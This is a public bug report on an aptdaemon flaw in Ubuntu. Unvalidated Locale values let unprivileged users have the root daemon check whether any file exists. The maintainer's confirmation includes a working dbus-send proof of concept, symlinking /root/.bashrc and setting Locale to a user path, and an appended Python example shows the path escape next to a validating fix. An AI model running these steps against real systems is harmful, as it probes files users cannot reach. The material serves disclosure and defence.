Improper Input Validation vulnerability in Locale property of a transaction leading to Information Disclosure
Affects | Status | Importance | Assigned to | Milestone |
---|---|---|---|---|
aptdaemon (Ubuntu) | Fix Released | Undecided | Unassigned | |
Bug Description
Hi,
There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root.
This is a similar type of bug as CVE-2015-1323.
See the attached Python script for details.
$ ./test_
File Exists!
$ ./test_
File does not exist!
Description: Ubuntu 20.04 LTS
Release: 20.04
aptdaemon:
Installed: 1.1.1+bzr982-
Candidate: 1.1.1+bzr982-
Version table:
*** 1.1.1+bzr982-
500 http://
500 http://
100 /var/lib/
1.
500 http://
500 http://
Kind regards,
Vaisha Bernard
EYE Control B.V.
CVE References
Changed in aptdaemon (Ubuntu):
status: New → Triaged
information type: Private Security → Public Security
Changed in aptdaemon (Ubuntu):
assignee: Ravikant (ravikantcool) → nobody
Yes I can confirm this is an issue and is quite similar to CVE-2015-1323 - like in https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587 a simple bash example via dbus-send is enough to demonstrate this:
$ mkdir -p /tmp/a/LC_MESSAGES
$ ln -s /root/.bashrc /tmp/a/LC_MESSAGES/aptdaemon.mo
$ dbus-send --print-reply --system --dest=org.debian.apt \
/org/debian/apt org.debian.apt.InstallFile \
string:/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb \
boolean:false
method return time=1595299798.945425 sender=:1.194 -> destination=:1.193 serial=7 reply_serial=2
string "/org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156"
$ dbus-send --print-reply --system --dest=org.debian.apt /org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156 org.freedesktop.DBus.Properties.Set string:org.debian.apt.transaction string:Locale string:/tmp/a.
Error org.freedesktop.DBus.Python.OSError: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/policykit1.py", line 152, in get_uid_from_dbus_name
    return_value(uid)
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 462, in return_value
    raise _DefGen_Return(val)
defer._DefGen_Return: 1000
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
StopIteration
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 1226, in _set_property
    self._set_locale(value)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 835, in _set_locale
    self._translation = gettext.translation("aptdaemon",
  File "/usr/lib/python3.8/gettext.py", line 613, in translation
    t = _translations.setdefault(key, class_(fp))
  File "/usr/lib/python3.8/gettext.py", line 261, in __init__
    self._parse(fp)
  File "/usr/lib/python3.8/gettext.py", line 393, in _parse
    raise OSError(0, 'Bad magic number', filename)
OSError: [Errno 0] Bad magic number: '/tmp/a/LC_MESSAGES/aptdaemon.mo'
Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?
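
An added example, not aptdaemon's code and not its released fix: it shows why a Locale value that carries a path makes the gettext catalog lookup seen in the traceback leave the locale directory, and one way to reject such values before the lookup. The function names, the accepted-name pattern and the temporary directory layout are assumptions made for the illustration.

```python
import gettext
import os
import re
import tempfile

# Assumed allow-list: language[_TERRITORY][.codeset][@modifier], no path characters.
_LOCALE_RE = re.compile(r"[A-Za-z]+(_[A-Za-z0-9]+)?(\.[A-Za-z0-9-]+)?(@[A-Za-z0-9]+)?")


def is_safe_locale(value):
    """True only for plain locale names such as 'de_DE.UTF-8' or 'C.UTF-8'."""
    return _LOCALE_RE.fullmatch(value) is not None


def catalog_lookup(locale_str, localedir, domain="aptdaemon"):
    """Unvalidated lookup (hypothetical helper): strip the encoding, ask gettext."""
    lang = locale_str.rpartition(".")[0] or locale_str
    # gettext builds os.path.join(localedir, lang, "LC_MESSAGES", domain + ".mo");
    # an absolute `lang` makes os.path.join discard localedir entirely.
    return gettext.find(domain, localedir=localedir, languages=[lang])


def safe_catalog_lookup(locale_str, localedir, domain="aptdaemon"):
    """Hardened variant: reject anything that is not a plain locale name."""
    if not is_safe_locale(locale_str):
        raise ValueError("invalid locale name: %r" % (locale_str,))
    return catalog_lookup(locale_str, localedir, domain)


def demo():
    """Constructed layout in a temp dir: a locale dir and a user-writable dir."""
    with tempfile.TemporaryDirectory() as root:
        localedir = os.path.join(root, "locale")
        user_dir = os.path.join(root, "a")
        os.makedirs(localedir)
        os.makedirs(os.path.join(user_dir, "LC_MESSAGES"))
        planted = os.path.join(user_dir, "LC_MESSAGES", "aptdaemon.mo")
        open(planted, "wb").close()
        value = user_dir + "."  # same shape as the '/tmp/a.' value in the report
        escaped = catalog_lookup(value, localedir) == planted
        try:
            safe_catalog_lookup(value, localedir)
            rejected = False
        except ValueError:
            rejected = True
        return escaped, rejected


if __name__ == "__main__":
    print(demo())
```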